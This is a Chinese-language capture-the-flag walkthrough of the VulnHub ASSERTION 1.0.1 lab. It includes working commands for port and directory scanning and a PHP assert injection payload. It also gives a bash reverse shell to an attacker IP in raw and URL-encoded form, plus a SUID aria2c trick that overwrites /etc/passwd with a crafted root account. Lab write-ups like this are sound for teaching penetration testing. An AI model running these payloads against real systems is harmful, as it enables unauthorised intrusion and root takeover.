vulnhub - ASSERTION 1.0.1
資訊收集
nmap -sT --min-rate 10000 -p- 192.168.157.171
sudo nmap -sT -sV -sC -O -p22,80 192.168.157.171
只開放了ssh和http,那就先從web入手
目錄掃描
sudo gobuster dir -u 192.168.157.171 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
看了一下沒什麼可用資訊。。
本地檔案包含
點選網頁到處看看發現引數是http://192.168.157.171/index.php?page=
目錄穿越失敗,但看錯誤提示應該是有防護,測試了一下應該是對..進行了過濾
翻閱 https://github.com/HackTricks-wiki/hacktricks/blob/master/pentesting-web/file-inclusion/README.md
使用' and die(highlight_file('/etc/passwd')) or '成功讀取
嘗試命令執行,打一個反彈shell
' and die(system('bash -c "exec bash -i >& /dev/tcp/192.168.157.161/9999 0>&1"')) or '
需要URL編碼
%27%20and%20die%28system%28%27bash%20%2Dc%20%20%22exec%20bash%20%2Di%20%3E%26%20%2Fdev%2Ftcp%2F192%2E168%2E157%2E161%2F9999%200%3E%261%22%27%29%29%20or%20%27
查詢具有SUID許可權的檔案
find / -perm -4000 -print 2>/dev/null
aria2c提權
aria2c是下載檔案的程式,可以嘗試用於覆蓋 /etc/passwd
將 /etc/passwd 儲存到 kali上,生成一個具有root許可權的使用者
openssl passwd -1 -salt hacker 123456
$1$hacker$6luIRwdGpBvXdP.GMwcZp/
修改為如下格式
hacker:$1$hacker$6luIRwdGpBvXdP.GMwcZp/:0:0::/root:/bin/bash
存入剛才儲存到kali的passwd內
本地開啟http服務
python3 -m http.server
讓目標靶機下載修改好的passwd並覆蓋的passwd
aria2c --on-download-error=$TF http://192.168.157.161:8000/passwd --allow-overwrite=true
root@assertion:~# cat root.txt
cat root.txt
8efabdae07730bdcb14d83e37a2e7398